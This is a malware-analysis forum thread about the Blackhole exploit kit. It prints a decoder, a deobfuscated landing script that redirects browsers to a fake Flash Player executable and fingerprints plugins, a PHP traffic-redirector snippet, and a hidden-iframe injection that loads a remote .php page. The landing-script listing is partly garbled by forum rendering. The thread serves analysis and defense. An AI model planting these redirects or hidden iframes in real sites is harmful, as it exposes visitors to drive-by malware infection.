 #23380  by EP_X0FF
 Wed Jul 16, 2014 4:33 am
This is a Blackhole redirector.
 #23382  by 0rbit
 Wed Jul 16, 2014 12:54 pm
EP_X0FF wrote:This is Blackhole redirector.
I thought it was a Java malware applet, but yeah, thank you :)
 #23385  by EP_X0FF
 Wed Jul 16, 2014 2:19 pm
If this is the same Blackhole script dump as http://pastebin.com/zKM4sDXu, then it seems incomplete and very old.

Piece of obfuscated BH script

Deobfuscation code.
.replace(/zxcvbn/g,"");
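// Stage 2 of the analyst's decoder. `a` (set on the line above) holds the
// obfuscated payload with its "zxcvbn" junk already stripped: a string of
// two-character hex pairs. Each pair becomes one byte value in `b`.
b = [];
// `i < a.length` rather than `i - a.length != 0`: the original condition
// never terminates when the input has an odd length.
for (i = 0; i < a.length; i += 2) {
  // Radix 16. The original wrote `020`, a legacy octal literal that happens
  // to equal 16 but is a SyntaxError in strict mode / ES modules.
  b.push(parseInt(a.slice(i, i + 2), 16));
}
a = b;
w = 10; // period of the per-position key: the offset pattern repeats every 10 bytes
s = "";
// Walk the byte array backwards. For the byte at distance n from the end,
// the key is (n mod 10) - 6, so every byte is shifted by -6..+3 depending on
// its position; concatenating the shifted bytes yields the decoded script.
for (k = a.length - 1; k >= 0; k--) {
  v = a[k];
  n = a.length - k - 1;
  n = n - Math.floor(n / w) * w; // n mod w
  z = v + (n - 6);
  s = s + String.fromCharCode(z);
}
// Emit the decoded text once, after the loop. The original called
// document.write(s) on every iteration, dumping every partial prefix of the
// result. At this point the malware itself does eval(s); an analyst only
// wants to read the text, hence write instead of eval.
document.write(s);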
Deobfuscated result.
// NOTE(review): the forum rendering stripped the HTML tags out of this string
// literal, so the line breaks inside the quotes are an artifact of the paste,
// not the sample's actual text — confirm against the raw page before quoting it.
document.write('
Waiting for redirect...
');

// Final stage of the redirect chain: sends the browser straight to the
// executable below, i.e. the payload download URL (the file name suggests a
// fake Flash Player update lure). The caller of end_redirect() is not visible
// in this listing. From a defender's view the host and path here are the
// indicators to block and hunt for in proxy logs.
function end_redirect() {
    window.location.href = 'http://vanthaligurukul.com/updateflashplayer.exe';
}
try {
    var PluginDetect = {
            version: "0.7.8",
            name: "PluginDetect",
            handler: function (c, b, a) {
                return function () {
                    c(b, a)
                }
            },
            isDefined: function (b) {
                return typeof b != "undefined"
            },
            isArray: function (b) {
                return (/array/i).test(Object.prototype.toString.call(b))
            },
            isFunc: function (b) {
                return typeof b == "function"
            },
            isString: function (b) {
                return typeof b == "string"
            },
            isNum: function (b) {
                return typeof b == "number"
            },
            isStrNum: function (b) {
                return (typeof b == "string" && (/\d/).test(b))
            },
            getNumRegx: /[\d][\d\.\_,-]*/,
            splitNumRegx: /[\.\_,-]/g,
            getNum: function (b, c) {
                var d = this,
                    a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
                return a ? a[0] : null
            },
            compareNums: function (h, f, d) {
                var e = this,
                    c, b, a, g = parseInt;
                if (e.isStrNum(h) && e.isStrNum(f)) {
                    if (e.isDefined(d) && d.compareNums) {
                        return d.compareNums(h, f)
                    }
                    c = h.split(e.splitNumRegx);
                    b = f.split(e.splitNumRegx);
                    for (a = 0; ag(b[a], 10)) {
                        return 1
                    }
                    if (g(c[a], 10) c || !(/\d/).test(e[a])) {
                        e[a] = "0"
                    }
                }
                return e.slice(0, 4).join(",")
            },
            $$hasMimeType: function (a) {
                    return function (c) {
                            if (!a.isIE && c) {
                                var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                                for (b = 0; b2 || !f || !f.version || !(e = h.getNum(f.version))) {
                                    return b
                                }
                                if (!b) {
                                    return e
                                }
                                e = h.formatNum(e);
                                b = h.formatNum(b);
                                d = b.split(h.splitNumRegx);
                                g = e.split(h.splitNumRegx);
                                for (a = 0; a - 1 && a > c && d[a] != "0") {
                                    return b
                                }
                                if (g[a] != d[a]) {
                                    if (c == -1) {
                                        c = a
                                    }
                                    if (d[a] != "0") {
                                        return b
                                    }
                                }
                            }
                            return e
                        }, AXO: window.ActiveXObject, getAXO: function (a) {
                            var f = null,
                                d, b = this,
                                c = {};
                            try {
                                f = new b.AXO(a)
                            } catch (d) {}
                            return f
                        }, convertFuncs: function (f) {
                            var a, g, d, b = /^[\$][\$]/,
                                c = this;
                            for (a in f) {
                                if (b.test(a)) {
                                    try {
                                        g = a.slice(2);
                                        if (g.length > 0 && !f[g]) {
                                            f[g] = f[a](f);
                                            delete f[a]
                                        }
                                    } catch (d) {}
                                }
                            }
                        }, initObj: function (e, b, d) {
                            var a, c;
                            if (e) {
                                if (e[b[0]] == 1 || d) {
                                    for (a = 0; a = 0; f = f - 2) {
                                        if (d[f] && new RegExp(d[f], "i").test(b)) {
                                            c.OS = d[f + 1];
                                            break
                                        }
                                    }
                                }
                                c.convertFuncs(c);
                                c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
                                c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
                                c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
                                c.ActiveXEnabled = false;
                                if (c.isIE) {
                                    var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
                                    for (f = 0; f0 && c.isFunc(b[0])))) {
                                a.push(b)
                            }
                        }, callArray: function (b) {
                            var c = this,
                                a;
                            if (c.isArray(b)) {
                                for (a = 0; a0 && b.isFunc(c[0])) {
                                    c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
                                } else {
                                    if (b.isFunc(c)) {
                                        c(b)
                                    }
                                }
                            }, getVersionDelimiter: ",", $$getVersion: function (a) {
                                    return function (g, d, c) {
                                        var e = a.init(g),
                                            f, b, h = {};
                                        if (e.status < 0) {
                                            return null
                                        };
                                        f = e.plugin;
                                        if (f.getVersionDone != 1) {
                                            f.getVersion(null, d, c);
                                            if (f.getVersionDone === null) {
                                                f.getVersionDone = 1
                                            }
                                        }
                                        a.cleanup();
                                        b = (f.version || f.version0);
                                        b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
                                        return b
                                    }
                                }, cleanup: function () {
                                    var a = this;
                                    if (a.garbage && a.isDefined(window.CollectGarbage)) {
                                        window.CollectGarbage()
                                    }
                                }, addWinEvent: function (d, c) {
                                    var e = this,
                                        a = window,
                                        b;
                                    if (e.isFunc(c)) {
                                        if (a.addEventListener) {
                                            a.addEventListener(d, c, false)
                                        } else {
                                            if (a.attachEvent) {
                                                a.attachEvent("on" + d, c)
                                            } else {
                                                b = a["on" + d];
                                                a["on" + d] = e.winHandler(c, b)
                                            }
                                        }
                                    }
                                }, winHandler: function (d, c) {
                                    return function () {
                                        d();
                                        if (typeof c == "function") {
                                            c()
                                        }
                                    }
                                }, WLfuncs0: [], WLfuncs: [], runWLfuncs: function (a) {
                                    var b = {};
                                    a.winLoaded = true;
                                    a.callArray(a.WLfuncs0);
                                    a.callArray(a.WLfuncs);
                                    if (a.onDoneEmptyDiv) {
                                        a.onDoneEmptyDiv()
                                    }
                                }, winLoaded: false, $$onWindowLoaded: function (a) {
                                    return function (b) {
                                        if (a.winLoaded) {
                                            a.call(b)
                                        } else {
                                            a.fPush(b, a.WLfuncs)
                                        }
                                    }
                                }, $$onDetectionDone: function (a) {
                                    return function (h, g, c, b) {
                                        var d = a.init(h),
                                            k, e, j = {};
                                        if (d.status == -3) {
                                            return -1
                                        }
                                        e = d.plugin;
                                        if (!a.isArray(e.funcs)) {
                                            e.funcs = []
                                        }
                                        if (e.getVersionDone != 1) {
                                            k = a.isMinVersion ? a.isMinVersion(h, "0", c, b) : a.getVersion(h, c, b)
                                        }
                                        if (e.installed != -0.5 && e.installed != 0.5) {
                                            a.call(g);
                                            return 1
                                        }
                                        if (e.NOTF) {
                                            a.fPush(g, e.funcs);
                                            return 0
                                        }
                                        return 1
                                    }
                                }, div: null, divID: "plugindetect", divWidth: 50, pluginSize: 1, emptyDiv: function () {
                                    var d = this,
                                        b, h, c, a, f, g;
                                    if (d.div && d.div.childNodes) {
                                        for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                                            c = d.div.childNodes[b];
                                            if (c && c.childNodes) {
                                                for (h = c.childNodes.length - 1; h >= 0; h--) {
                                                    g = c.childNodes[h];
                                                    try {
                                                        c.removeChild(g)
                                                    } catch (f) {}
                                                }
                                            }
                                            if (c) {
                                                try {
                                                    d.div.removeChild(c)
                                                } catch (f) {}
                                            }
                                        }
                                    }
                                    if (!d.div) {
                                        a = document.getElementById(d.divID);
                                        if (a) {
                                            d.div = a
                                        }
                                    }
                                    if (d.div && d.div.parentNode) {
                                        try {
                                            d.div.parentNode.removeChild(d.div)
                                        } catch (f) {}
                                        d.div = null
                                    }
                                }, DONEfuncs: [], onDoneEmptyDiv: function () {
                                    var c = this,
                                        a, b;
                                    if (!c.winLoaded) {
                                        return
                                    }
                                    if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
                                        return
                                    }
                                    for (a in c) {
                                        b = c[a];
                                        if (b && b.funcs) {
                                            if (b.OTF == 3) {
                                                return
                                            }
                                            if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                                                return
                                            }
                                        }
                                    }
                                    for (a = 0; a = i) {
                                        return -1
                                    }
                                    try {
                                        if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                                            if (!m.winLoaded && c.winLoaded) {
                                                return 1
                                            }
                                            if (m.winLoaded && c.isNum(b)) {
                                                if (!c.isNum(m.count)) {
                                                    m.count = b
                                                }
                                                if (b - m.count >= 10) {
                                                    return 1
                                                }
                                            }
                                        }
                                    } catch (f) {}
                                    return 0
                                }, getDOMobj: function (g, a) {
                                    var f, d = this,
                                        c = g ? g.span : 0,
                                        b = c && c.firstChild ? 1 : 0;
                                    try {
                                        if (b && a) {
                                            d.div.focus()
                                        }
                                    } catch (f) {}
                                    return b ? c.firstChild : null
                                }, setStyle: function (b, g) {
                                    var f = b.style,
                                        a, d, c = this;
                                    if (f && g) {
                                        for (a = 0; ao '+c+"/div>");d=j.getElementById(b)}catch(h){}}g=(j.getElementsByTagName("body")[0]||j.body);if(g){if(g.firstChild&&f.isDefined(g.insertBefore)){g.insertBefore(a,g.firstChild)}else{g.appendChild(a)}if(d){g.removeChild(d)}}els
Where did you find this BH landing, and why is it incomplete?
 #23388  by Xylitol
 Wed Jul 16, 2014 4:30 pm
Not so long ago there was a Blackhole here: http://urlquery.net/report.php?id=1404469350804
<?php 
// Redirector glue: asks a remote api.php (thread/key parameters — presumably
// a traffic-distribution endpoint) for the next-hop URL and bounces the
// visitor there with a Refresh header. The `xxx` parts are placeholders in
// the post, not live values.
$url = 'http://xxx/api.php?thread=xxx&key=xxx'; // link that vetted browsers are redirected to (translated from Russian)

 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,$url);
 curl_setopt($ch, CURLOPT_HEADER, 0); // original comment said "read the header"; 0 actually EXCLUDES response headers from the returned data
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); // return the body from curl_exec() instead of printing it
 curl_setopt ($ch, CURLOPT_FAILONERROR, 1); // HTTP status >= 400 makes curl_exec() return false, so a dead endpoint yields an empty redirect target
 $result = curl_exec($ch);  
 curl_close($ch);
 // header() returns nothing, so the echo prints nothing; the redirect is
 // carried entirely by the 'Refresh: 0;<url>' header built from the fetched body.
 echo header( 'Refresh: 0;'.$result );
?>
 #30577  by Antelox
 Wed Jul 12, 2017 5:43 pm
ikolor wrote:Is it possible to extract more information from this HTML file?

https://www.virustotal.com/en/file/f9db ... 499847827/
This is an old page infected by the Blackhole EK.

The malicious iframe, after deobfuscation, looks like this:
// Injection entry point. If a <body> element already exists, the frame is
// added through the DOM (iframer() below); otherwise the script falls back to
// document.write. Both paths load the same count26.php URL in a 10x10,
// hidden, absolutely-positioned frame pinned to the top-left corner — an
// invisible frame, presumably pointing at the exploit-kit landing page.
// Detection hint: a hidden/zero-size iframe created from inline script.
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://zihemmi.ru/count26.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// DOM-based variant of the same injection: builds an iframe element with the
// identical src, size and visibility settings and appends it to <body>.
// Called only when a <body> exists at the time the script runs.
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://zihemmi.ru/count26.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
http://zihemmi.ru/count26.php
BR,

Antelox